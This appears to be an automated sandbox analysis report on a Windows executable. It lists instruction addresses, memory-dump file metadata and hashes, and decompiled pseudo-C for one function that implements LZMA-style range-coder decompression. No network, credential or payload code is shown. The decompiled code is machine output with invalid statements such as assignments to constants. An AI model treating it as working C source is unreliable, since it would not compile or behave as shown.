                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x004061d4
                0x004061d6
                0x004061d9
                0x0040624a
                0x0040624d
                0x00406250
                0x00406257
                0x00406261
                0x00000000
                0x00406261
                0x004061db
                0x004061df
                0x004061e2
                0x004061e4
                0x004061e7
                0x004061ea
                0x004061ec
                0x004061ef
                0x004061f1
                0x004061f6
                0x004061f9
                0x004061fc
                0x00406200
                0x00406207
                0x0040620a
                0x00406211
                0x00406215
                0x0040621d
                0x0040621d
                0x0040621d
                0x00406217
                0x00406217
                0x00406217
                0x0040620c
                0x0040620c
                0x0040620c
                0x00406221
                0x00406224
                0x00406242
                0x00406244
                0x00000000
                0x00406226
                0x00406226
                0x00406229
                0x0040622c
                0x0040622f
                0x00406231
                0x00406231
                0x00406231
                0x00406234
                0x00406237
                0x00406239
                0x0040623a
                0x0040623d
                0x00000000
                0x0040623d
                0x00000000
                0x00406473
                0x00406477
                0x00406495
                0x00406498
                0x0040649f
                0x004064a2
                0x004064a5
                0x004064a8
                0x004064ab
                0x004064ae
                0x004064b0
                0x004064b7
                0x004064b8
                0x004064ba
                0x004064bd
                0x004064c0
                0x004064c3
                0x004064c3
                0x004064c8
                0x00000000
                0x004064c8
                0x00406479
                0x0040647c
                0x0040647f
                0x00406489
                0x00000000
                0x00000000
                0x004064dd
                0x004064e1
                0x00406504
                0x00406507
                0x0040650a
                0x00406514
                0x004064e3
                0x004064e3
                0x004064e6
                0x004064e9
                0x004064ec
                0x004064f9
                0x004064fc
                0x004064fc
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x00406591
                0x00406595
                0x0040659c
                0x0040659f
                0x004065a2
                0x004065ac
                0x00000000
                0x004065ac
                0x00406597
                0x00000000
                0x00000000
                0x004065b8
                0x004065bc
                0x004065c3
                0x004065c6
                0x004065c9
                0x004065be
                0x004065be
                0x004065be
                0x004065cc
                0x004065cf
                0x004065d2
                0x004065d2
                0x004065d5
                0x004065d8
                0x00000000
                0x00000000
                0x00406678
                0x00406678
                0x0040667c
                0x00406a1a
                0x00000000
                0x00406a1a
                0x00406682
                0x00406685
                0x00406688
                0x0040668c
                0x0040668f
                0x00406695
                0x00406697
                0x00406697
                0x00406697
                0x0040669a
                0x0040669d
                0x00000000
                0x00000000
                0x0040626d
                0x0040626d
                0x00406271
                0x004069de
                0x00000000
                0x004069de
                0x00406277
                0x0040627a
                0x0040627d
                0x00406281
                0x00406284
                0x0040628a
                0x0040628c
                0x0040628c
                0x0040628c
                0x0040628f
                0x00406292
                0x00406292
                0x00406295
                0x00406298
                0x00000000
                0x00000000
                0x0040629e
                0x004062a4
                0x00000000
                0x00000000
                0x004062aa
                0x004062aa
                0x004062ae
                0x004062b1
                0x004062b4
                0x004062b7
                0x004062ba
                0x004062bb
                0x004062be
                0x004062c0
                0x004062c6
                0x004062c9
                0x004062cc
                0x004062cf
                0x004062d2
                0x004062d5
                0x004062d8
                0x004062f4
                0x004062f7
                0x004062fa
                0x004062fd
                0x00406304
                0x00406308
                0x0040630a
                0x0040630e
                0x004062da
                0x004062da
                0x004062de
                0x004062e6
                0x004062eb
                0x004062ed
                0x004062ef
                0x004062ef
                0x00406311
                0x00406318
                0x0040631b
                0x00000000
                0x00406321
                0x00000000
                0x00406321
                0x00000000
                0x00406326
                0x00406326
                0x0040632a
                0x004069ea
                0x00000000
                0x004069ea
                0x00406330
                0x00406333
                0x00406336
                0x0040633a
                0x0040633d
                0x00406343
                0x00406345
                0x00406345
                0x00406345
                0x00406348
                0x0040634b
                0x0040634b
                0x0040634b
                0x00406351
                0x00000000
                0x00000000
                0x00406353
                0x00406356
                0x00406359
                0x0040635c
                0x0040635f
                0x00406362
                0x00406365
                0x00406368
                0x0040636b
                0x0040636e
                0x00406371
                0x00406389
                0x0040638c
                0x0040638f
                0x00406392
                0x00406392
                0x00406395
                0x00406399
                0x0040639b
                0x00406373
                0x00406373
                0x0040637b
                0x00406380
                0x00406382
                0x00406384
                0x00406384
                0x0040639e
                0x004063a5
                0x004063a8
                0x00000000
                0x004063aa
                0x00000000
                0x004063aa
                0x004063a8
                0x004063af
                0x004063af
                0x004063af
                0x004063af
                0x00000000
                0x00000000
                0x004063ea
                0x004063ea
                0x004063ee
                0x004069f6
                0x00000000
                0x004069f6
                0x004063f4
                0x004063f7
                0x004063fa
                0x004063fe
                0x00406401
                0x00406407
                0x00406409
                0x00406409
                0x00406409
                0x0040640c
                0x0040640f
                0x0040640f
                0x00406415
                0x004063b3
                0x004063b3
                0x004063b6
                0x00000000
                0x004063b6
                0x00406417
                0x00406417
                0x0040641a
                0x0040641d
                0x00406420
                0x00406423
                0x00406426
                0x00406429
                0x0040642c
                0x0040642f
                0x00406432
                0x00406435
                0x0040644d
                0x00406450
                0x00406453
                0x00406456
                0x00406456
                0x00406459
                0x0040645d
                0x0040645f
                0x00406437
                0x00406437
                0x0040643f
                0x00406444
                0x00406446
                0x00406448
                0x00406448
                0x00406462
                0x00406469
                0x0040646c
                0x00000000
                0x0040646e
                0x00000000
                0x0040646e
                0x00000000
                0x004066fb
                0x004066fb
                0x004066ff
                0x00406a26
                0x00000000
                0x00406a26
                0x00406705
                0x00406708
                0x0040670b
                0x0040670f
                0x00406712
                0x00406718
                0x0040671a
                0x0040671a
                0x0040671a
                0x0040671d
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x0040680a
                0x0040680e
                0x00406830
                0x00406833
                0x0040683d
                0x00000000
                0x0040683d
                0x00406810
                0x00406813
                0x00406817
                0x0040681a
                0x0040681a
                0x0040681d
                0x00000000
                0x00000000
                0x004068c7
                0x004068cb
                0x004068e9
                0x004068e9
                0x004068e9
                0x004068f0
                0x004068f7
                0x004068fe
                0x004068fe
                0x00000000
                0x004068fe
                0x004068cd
                0x004068d0
                0x004068d3
                0x004068d6
                0x004068dd
                0x00406821
                0x00406821
                0x00406824
                0x00000000
                0x00000000
                0x004069b8
                0x004069bb
                0x00000000
                0x00000000
                0x004065f2
                0x004065f4
                0x004065fb
                0x004065fc
                0x004065fe
                0x00406601
                0x00000000
                0x00000000
                0x00406609
                0x0040660c
                0x0040660f
                0x00406611
                0x00406613
                0x00406613
                0x00406614
                0x00406617
                0x0040661e
                0x00406621
                0x0040662f
                0x00000000
                0x00000000
                0x00406905
                0x00406905
                0x00406908
                0x0040690f
                0x00000000
                0x00000000
                0x00406914
                0x00406914
                0x00406918
                0x00406a50
                0x00000000
                0x00406a50
                0x0040691e
                0x00406921
                0x00406924
                0x00406928
                0x0040692b
                0x00406931
                0x00406933
                0x00406933
                0x00406933
                0x00406936
                0x00406939
                0x00406939
                0x00406939
                0x00406939
                0x0040693c
                0x0040693c
                0x00406940
                0x004069a0
                0x004069a3
                0x004069a8
                0x004069a9
                0x004069ab
                0x004069ad
                0x004069b0
                0x00000000
                0x004069b0
                0x00406942
                0x00406948
                0x0040694b
                0x0040694e
                0x00406951
                0x00406954
                0x00406957
                0x0040695a
                0x0040695d
                0x00406960
                0x00406963
                0x0040697c
                0x0040697f
                0x00406982
                0x00406985
                0x00406989
                0x0040698b
                0x0040698b
                0x0040698c
                0x0040698f
                0x00406965
                0x00406965
                0x0040696d
                0x00406972
                0x00406974
                0x00406977
                0x00406977
                0x00406992
                0x00406999
                0x00000000
                0x0040699b
                0x00000000
                0x0040699b
                0x00000000
                0x00406637
                0x0040663a
                0x00406670
                0x004067a0
                0x004067a0
                0x004067a0
                0x004067a0
                0x004067a3
                0x004067a3
                0x004067a6
                0x004067a8
                0x00406a32
                0x00000000
                0x00406a32
                0x004067ae
                0x004067b1
                0x00000000
                0x00000000
                0x004067b7
                0x004067bb
                0x004067be
                0x004067be
                0x004067be
                0x00000000
                0x004067be
                0x0040663c
                0x0040663e
                0x00406640
                0x00406642
                0x00406645
                0x00406646
                0x00406648
                0x0040664a
                0x0040664d
                0x00406650
                0x00406666
                0x0040666b
                0x004066a3
                0x004066a3
                0x004066a7
                0x004066d3
                0x004066d5
                0x004066dc
                0x004066df
                0x004066e2
                0x004066e2
                0x004066e7
                0x004066e7
                0x004066e9
                0x004066ec
                0x004066f3
                0x004066f6
                0x00406723
                0x00406723
                0x00406726
                0x00406729
                0x0040679d
                0x0040679d
                0x0040679d
                0x00000000
                0x0040679d
                0x0040672b
                0x00406731
                0x00406734
                0x00406737
                0x0040673a
                0x0040673d
                0x00406740
                0x00406743
                0x00406746
                0x00406749
                0x0040674c
                0x00406765
                0x00406767
                0x0040676a
                0x0040676b
                0x0040676e
                0x00406770
                0x00406773
                0x00406775
                0x00406777
                0x0040677a
                0x0040677c
                0x0040677f
                0x00406783
                0x00406785
                0x00406785
                0x00406786
                0x00406789
                0x0040678c
                0x0040674e
                0x0040674e
                0x00406756
                0x0040675b
                0x0040675d
                0x00406760
                0x00406760
                0x0040678f
                0x00406796
                0x00406720
                0x00406720
                0x00406720
                0x00406720
                0x00000000
                0x00406798
                0x00000000
                0x00406798
                0x00406796
                0x004066a9
                0x004066ac
                0x004066ae
                0x004066b1
                0x004066b4
                0x004066b7
                0x004066b9
                0x004066bc
                0x004066bf
                0x004066bf
                0x004066c2
                0x004066c2
                0x004066c5
                0x004066cc
                0x004066a0
                0x004066a0
                0x004066a0
                0x004066a0
                0x00000000
                0x004066ce
                0x00000000
                0x004066ce
                0x004066cc
                0x00406652
                0x00406655
                0x00406657
                0x0040665a
                0x00000000
                0x00000000
                0x004063b9
                0x004063b9
                0x004063bd
                0x00406a02
                0x00000000
                0x00406a02
                0x004063c3
                0x004063c6
                0x004063c9
                0x004063cc
                0x004063cf
                0x004063d2
                0x004063d5
                0x004063d7
                0x004063da
                0x004063dd
                0x004063e0
                0x004063e2
                0x004063e2
                0x004063e2
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x004067c1
                0x004067c1
                0x004067c1
                0x004067c5
                0x00000000
                0x00000000
                0x004067cb
                0x004067ce
                0x004067d1
                0x004067d4
                0x004067d6
                0x004067d6
                0x004067d6
                0x004067d9
                0x004067dc
                0x004067df
                0x004067e2
                0x004067e5
                0x004067e8
                0x004067e9
                0x004067eb
                0x004067eb
                0x004067eb
                0x004067ee
                0x004067f1
                0x004067f4
                0x004067f7
                0x004067fa
                0x004067fe
                0x00406800
                0x00406803
                0x00000000
                0x00406805
                0x00000000
                0x00406805
                0x00406803
                0x00406a38
                0x00000000
                0x00000000
                0x00406067

                Memory Dump Source
                • Source File: 00000000.00000002.263609418.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.263603207.0000000000400000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.263627006.0000000000407000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.263631692.0000000000409000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.263647032.0000000000417000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.263653995.0000000000422000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.263661513.000000000042A000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.263668333.000000000042D000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.263691098.000000000043D000.00000002.00020000.sdmp Download File
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 7dec09a748792e581ac56a4790c1b6395b646ad41e7ca9f7da80e9268b46833e
                • Instruction ID: 178f069459afe4b8f6f8f854f87fc4d5347ab2ec506c5a0858b6a976d85c5aaa
                • Opcode Fuzzy Hash: 7dec09a748792e581ac56a4790c1b6395b646ad41e7ca9f7da80e9268b46833e
                • Instruction Fuzzy Hash: 8E816871E00228CFDF24DFA8C8447ADBBB1FB45301F25816AD816BB281C7785A96DF44
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00406025, Relevance: 5.2, APIs: 4, Instructions: 198COMMON
                Download Yara Rule
                C-Code - Quality: 98%
                			E00406025(void* __ecx) {
				void* _v8;
				void* _v12;
				signed int _v16;
				unsigned int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v95;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				intOrPtr _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				void _v140;
				void* _v148;
				signed int _t537;
				signed int _t538;
				signed int _t572;

				_t572 = 0x22;
				_v148 = __ecx;
				memcpy( &_v140, __ecx, _t572 << 2);
				if(_v52 == 0xffffffff) {
					return 1;
				}
				while(1) {
					L3:
					_t537 = _v140;
					if(_t537 > 0x1c) {
						break;
					}
					switch( *((intOrPtr*)(_t537 * 4 +  &M00406A77))) {
						case 0:
							__eflags = _v112;
							if(_v112 == 0) {
								goto L173;
							}
							_v112 = _v112 - 1;
							_v116 = _v116 + 1;
							_t537 =  *_v116;
							__eflags = _t537 - 0xe1;
							if(_t537 > 0xe1) {
								goto L174;
							}
							_t542 = _t537 & 0x000000ff;
							_push(0x2d);
							asm("cdq");
							_pop(_t576);
							_push(9);
							_pop(_t577);
							_t622 = _t542 / _t576;
							_t544 = _t542 % _t576 & 0x000000ff;
							asm("cdq");
							_t617 = _t544 % _t577 & 0x000000ff;
							_v64 = _t617;
							_v32 = (1 << _t622) - 1;
							_v28 = (1 << _t544 / _t577) - 1;
							_t625 = (0x300 << _t617 + _t622) + 0x736;
							__eflags = 0x600 - _v124;
							if(0x600 == _v124) {
								L12:
								__eflags = _t625;
								if(_t625 == 0) {
									L14:
									_v76 = _v76 & 0x00000000;
									_v68 = _v68 & 0x00000000;
									goto L17;
								} else {
									goto L13;
								}
								do {
									L13:
									_t625 = _t625 - 1;
									__eflags = _t625;
									 *((short*)(_v8 + _t625 * 2)) = 0x400;
								} while (_t625 != 0);
								goto L14;
							}
							__eflags = _v8;
							if(_v8 != 0) {
								GlobalFree(_v8);
							}
							_t537 = GlobalAlloc(0x40, 0x600); // executed
							__eflags = _t537;
							_v8 = _t537;
							if(_t537 == 0) {
								goto L174;
							} else {
								_v124 = 0x600;
								goto L12;
							}
						case 1:
							L15:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 1;
								goto L173;
							}
							_v112 = _v112 - 1;
							_v68 = _v68 | ( *_v116 & 0x000000ff) << _v76 << 0x00000003;
							_v116 = _v116 + 1;
							_t50 =  &_v76;
							 *_t50 = _v76 + 1;
							__eflags =  *_t50;
							L17:
							__eflags = _v76 - 4;
							if(_v76 < 4) {
								goto L15;
							}
							_t550 = _v68;
							__eflags = _t550 - _v120;
							if(_t550 == _v120) {
								L22:
								_v76 = 5;
								 *(_v12 + _v120 - 1) =  *(_v12 + _v120 - 1) & 0x00000000;
								goto L25;
							}
							__eflags = _v12;
							_v120 = _t550;
							if(_v12 != 0) {
								GlobalFree(_v12); // executed
							}
							_t537 = GlobalAlloc(0x40, _v68); // executed
							__eflags = _t537;
							_v12 = _t537;
							if(_t537 == 0) {
								goto L174;
							} else {
								goto L22;
							}
						case 2:
							L26:
							_t557 = _v100 & _v32;
							_v136 = 6;
							_v80 = _t557;
							_t626 = _v8 + ((_v60 << 4) + _t557) * 2;
							goto L135;
						case 3:
							L23:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 3;
								goto L173;
							}
							_v112 = _v112 - 1;
							_t72 =  &_v116;
							 *_t72 = _v116 + 1;
							__eflags =  *_t72;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							L25:
							_v76 = _v76 - 1;
							__eflags = _v76;
							if(_v76 != 0) {
								goto L23;
							}
							goto L26;
						case 4:
							L136:
							_t559 =  *_t626;
							_t610 = _t559 & 0x0000ffff;
							_t591 = (_v20 >> 0xb) * _t610;
							__eflags = _v16 - _t591;
							if(_v16 >= _t591) {
								_v20 = _v20 - _t591;
								_v16 = _v16 - _t591;
								_v68 = 1;
								_t560 = _t559 - (_t559 >> 5);
								__eflags = _t560;
								 *_t626 = _t560;
							} else {
								_v20 = _t591;
								_v68 = _v68 & 0x00000000;
								 *_t626 = (0x800 - _t610 >> 5) + _t559;
							}
							__eflags = _v20 - 0x1000000;
							if(_v20 >= 0x1000000) {
								goto L142;
							} else {
								goto L140;
							}
						case 5:
							L140:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 5;
								goto L173;
							}
							_v20 = _v20 << 8;
							_v112 = _v112 - 1;
							_t464 =  &_v116;
							 *_t464 = _v116 + 1;
							__eflags =  *_t464;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							L142:
							_t561 = _v136;
							goto L143;
						case 6:
							__edx = 0;
							__eflags = _v68;
							if(_v68 != 0) {
								__eax = _v8;
								__ecx = _v60;
								_v56 = 1;
								_v136 = 7;
								__esi = _v8 + 0x180 + _v60 * 2;
								goto L135;
							}
							__eax = _v96 & 0x000000ff;
							__esi = _v100;
							__cl = 8;
							__cl = 8 - _v64;
							__esi = _v100 & _v28;
							__eax = (_v96 & 0x000000ff) >> 8;
							__ecx = _v64;
							__esi = (_v100 & _v28) << 8;
							__ecx = _v8;
							((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) = ((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2;
							__eax = ((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2 << 9;
							__eflags = _v60 - 4;
							__eax = (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2 << 9) + _v8 + 0xe6c;
							_v92 = (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2 << 9) + _v8 + 0xe6c;
							if(_v60 >= 4) {
								__eflags = _v60 - 0xa;
								if(_v60 >= 0xa) {
									_t103 =  &_v60;
									 *_t103 = _v60 - 6;
									__eflags =  *_t103;
								} else {
									_v60 = _v60 - 3;
								}
							} else {
								_v60 = 0;
							}
							__eflags = _v56 - __edx;
							if(_v56 == __edx) {
								__ebx = 0;
								__ebx = 1;
								goto L63;
							}
							__eax = _v24;
							__eax = _v24 - _v48;
							__eflags = __eax - _v120;
							if(__eax >= _v120) {
								__eax = __eax + _v120;
								__eflags = __eax;
							}
							__ecx = _v12;
							__ebx = 0;
							__ebx = 1;
							__al =  *((intOrPtr*)(__eax + __ecx));
							_v95 =  *((intOrPtr*)(__eax + __ecx));
							goto L43;
						case 7:
							__eflags = _v68 - 1;
							if(_v68 != 1) {
								__eax = _v40;
								_v132 = 0x16;
								_v36 = _v40;
								__eax = _v44;
								_v40 = _v44;
								__eax = _v48;
								_v44 = _v48;
								__eax = 0;
								__eflags = _v60 - 7;
								0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
								__al = __al & 0x000000fd;
								__eax = (__eflags >= 0) - 1 + 0xa;
								_v60 = (__eflags >= 0) - 1 + 0xa;
								__eax = _v8;
								__eax = _v8 + 0x664;
								__eflags = __eax;
								_v92 = __eax;
								goto L71;
							}
							__eax = _v8;
							__ecx = _v60;
							_v136 = 8;
							__esi = _v8 + 0x198 + _v60 * 2;
							goto L135;
						case 8:
							__eflags = _v68;
							if(_v68 != 0) {
								__eax = _v8;
								__ecx = _v60;
								_v136 = 0xa;
								__esi = _v8 + 0x1b0 + _v60 * 2;
							} else {
								__eax = _v60;
								__ecx = _v8;
								__eax = _v60 + 0xf;
								_v136 = 9;
								_v60 + 0xf << 4 = (_v60 + 0xf << 4) + _v80;
								__esi = _v8 + ((_v60 + 0xf << 4) + _v80) * 2;
							}
							goto L135;
						case 9:
							__eflags = _v68;
							if(_v68 != 0) {
								goto L92;
							}
							__eflags = _v100;
							if(_v100 == 0) {
								goto L174;
							}
							__eax = 0;
							__eflags = _v60 - 7;
							_t264 = _v60 - 7 >= 0;
							__eflags = _t264;
							0 | _t264 = _t264 + _t264 + 9;
							_v60 = _t264 + _t264 + 9;
							goto L78;
						case 0xa:
							__eflags = _v68;
							if(_v68 != 0) {
								__eax = _v8;
								__ecx = _v60;
								_v136 = 0xb;
								__esi = _v8 + 0x1c8 + _v60 * 2;
								goto L135;
							}
							__eax = _v44;
							goto L91;
						case 0xb:
							__eflags = _v68;
							if(_v68 != 0) {
								__ecx = _v40;
								__eax = _v36;
								_v36 = _v40;
							} else {
								__eax = _v40;
							}
							__ecx = _v44;
							_v40 = _v44;
							L91:
							__ecx = _v48;
							_v48 = __eax;
							_v44 = _v48;
							L92:
							__eax = _v8;
							_v132 = 0x15;
							__eax = _v8 + 0xa68;
							_v92 = _v8 + 0xa68;
							goto L71;
						case 0xc:
							L102:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0xc;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t340 =  &_v116;
							 *_t340 = _v116 + 1;
							__eflags =  *_t340;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							__eax = _v48;
							goto L104;
						case 0xd:
							L39:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0xd;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t127 =  &_v116;
							 *_t127 = _v116 + 1;
							__eflags =  *_t127;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							L41:
							__eax = _v68;
							__eflags = _v76 - _v68;
							if(_v76 != _v68) {
								goto L50;
							}
							__eflags = __ebx - 0x100;
							if(__ebx >= 0x100) {
								goto L56;
							}
							L43:
							__eax = _v95 & 0x000000ff;
							_v95 = _v95 << 1;
							__ecx = _v92;
							__eax = (_v95 & 0x000000ff) >> 7;
							_v76 = __eax;
							__eax = __eax + 1;
							__eax = __eax << 8;
							__eax = __eax + __ebx;
							__esi = _v92 + __eax * 2;
							_v20 = _v20 >> 0xb;
							__ax =  *__esi;
							_v88 = __esi;
							__edx = __ax & 0x0000ffff;
							__ecx = (_v20 >> 0xb) * __edx;
							__eflags = _v16 - __ecx;
							if(_v16 >= __ecx) {
								_v20 = _v20 - __ecx;
								_v16 = _v16 - __ecx;
								__cx = __ax;
								_v68 = 1;
								__cx = __ax >> 5;
								__eflags = __eax;
								__ebx = __ebx + __ebx + 1;
								 *__esi = __ax;
							} else {
								_v68 = _v68 & 0x00000000;
								_v20 = __ecx;
								0x800 = 0x800 - __edx;
								0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							__eflags = _v20 - 0x1000000;
							_v72 = __ebx;
							if(_v20 >= 0x1000000) {
								goto L41;
							} else {
								goto L39;
							}
						case 0xe:
							L48:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0xe;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t161 =  &_v116;
							 *_t161 = _v116 + 1;
							__eflags =  *_t161;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							while(1) {
								L50:
								__eflags = __ebx - 0x100;
								if(__ebx >= 0x100) {
									break;
								}
								__eax = _v92;
								__edx = __ebx + __ebx;
								__ecx = _v20;
								__esi = __edx + __eax;
								__ecx = _v20 >> 0xb;
								__ax =  *__esi;
								_v88 = __esi;
								__edi = __ax & 0x0000ffff;
								__ecx = (_v20 >> 0xb) * __edi;
								__eflags = _v16 - __ecx;
								if(_v16 >= __ecx) {
									_v20 = _v20 - __ecx;
									_v16 = _v16 - __ecx;
									__cx = __ax;
									_t175 = __edx + 1; // 0x1
									__ebx = _t175;
									__cx = __ax >> 5;
									__eflags = __eax;
									 *__esi = __ax;
								} else {
									_v20 = __ecx;
									0x800 = 0x800 - __edi;
									0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
									__ebx = __ebx + __ebx;
									 *__esi = __cx;
								}
								__eflags = _v20 - 0x1000000;
								_v72 = __ebx;
								if(_v20 >= 0x1000000) {
									continue;
								} else {
									goto L48;
								}
							}
							L56:
							_t178 =  &_v56;
							 *_t178 = _v56 & 0x00000000;
							__eflags =  *_t178;
							goto L57;
						case 0xf:
							L60:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0xf;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t208 =  &_v116;
							 *_t208 = _v116 + 1;
							__eflags =  *_t208;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							L62:
							__eflags = __ebx - 0x100;
							if(__ebx >= 0x100) {
								L57:
								__al = _v72;
								_v96 = _v72;
								goto L58;
							}
							L63:
							__eax = _v92;
							__edx = __ebx + __ebx;
							__ecx = _v20;
							__esi = __edx + __eax;
							__ecx = _v20 >> 0xb;
							__ax =  *__esi;
							_v88 = __esi;
							__edi = __ax & 0x0000ffff;
							__ecx = (_v20 >> 0xb) * __edi;
							__eflags = _v16 - __ecx;
							if(_v16 >= __ecx) {
								_v20 = _v20 - __ecx;
								_v16 = _v16 - __ecx;
								__cx = __ax;
								_t222 = __edx + 1; // 0x1
								__ebx = _t222;
								__cx = __ax >> 5;
								__eflags = __eax;
								 *__esi = __ax;
							} else {
								_v20 = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							__eflags = _v20 - 0x1000000;
							_v72 = __ebx;
							if(_v20 >= 0x1000000) {
								goto L62;
							} else {
								goto L60;
							}
						case 0x10:
							L112:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0x10;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t371 =  &_v116;
							 *_t371 = _v116 + 1;
							__eflags =  *_t371;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							goto L114;
						case 0x11:
							L71:
							__esi = _v92;
							_v136 = 0x12;
							goto L135;
						case 0x12:
							__eflags = _v68;
							if(_v68 != 0) {
								__eax = _v92;
								_v136 = 0x13;
								__esi = _v92 + 2;
								L135:
								_v88 = _t626;
								goto L136;
							}
							__eax = _v80;
							_v52 = _v52 & 0x00000000;
							__ecx = _v92;
							__eax = _v80 << 4;
							__eflags = __eax;
							__eax = _v92 + __eax + 4;
							goto L133;
						case 0x13:
							__eflags = _v68;
							if(_v68 != 0) {
								_t475 =  &_v92;
								 *_t475 = _v92 + 0x204;
								__eflags =  *_t475;
								_v52 = 0x10;
								_v68 = 8;
								L147:
								_v128 = 0x14;
								goto L148;
							}
							__eax = _v80;
							__ecx = _v92;
							__eax = _v80 << 4;
							_v52 = 8;
							__eax = _v92 + (_v80 << 4) + 0x104;
							L133:
							_v92 = __eax;
							_v68 = 3;
							goto L147;
						case 0x14:
							_v52 = _v52 + __ebx;
							__eax = _v132;
							goto L143;
						case 0x15:
							__eax = 0;
							__eflags = _v60 - 7;
							0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
							__al = __al & 0x000000fd;
							__eax = (__eflags >= 0) - 1 + 0xb;
							_v60 = (__eflags >= 0) - 1 + 0xb;
							goto L123;
						case 0x16:
							__eax = _v52;
							__eflags = __eax - 4;
							if(__eax >= 4) {
								_push(3);
								_pop(__eax);
							}
							__ecx = _v8;
							_v68 = 6;
							__eax = __eax << 7;
							_v128 = 0x19;
							_v92 = __eax;
							goto L148;
						case 0x17:
							L148:
							__eax = _v68;
							_v84 = 1;
							_v76 = _v68;
							goto L152;
						case 0x18:
							L149:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0x18;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t490 =  &_v116;
							 *_t490 = _v116 + 1;
							__eflags =  *_t490;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							L151:
							_t493 =  &_v76;
							 *_t493 = _v76 - 1;
							__eflags =  *_t493;
							L152:
							__eflags = _v76;
							if(_v76 <= 0) {
								__ecx = _v68;
								__ebx = _v84;
								0 = 1;
								__eax = 1 << __cl;
								__ebx = _v84 - (1 << __cl);
								__eax = _v128;
								_v72 = __ebx;
								L143:
								_v140 = _t561;
								goto L3;
							}
							__eax = _v84;
							_v20 = _v20 >> 0xb;
							__edx = _v84 + _v84;
							__eax = _v92;
							__esi = __edx + __eax;
							_v88 = __esi;
							__ax =  *__esi;
							__edi = __ax & 0x0000ffff;
							__ecx = (_v20 >> 0xb) * __edi;
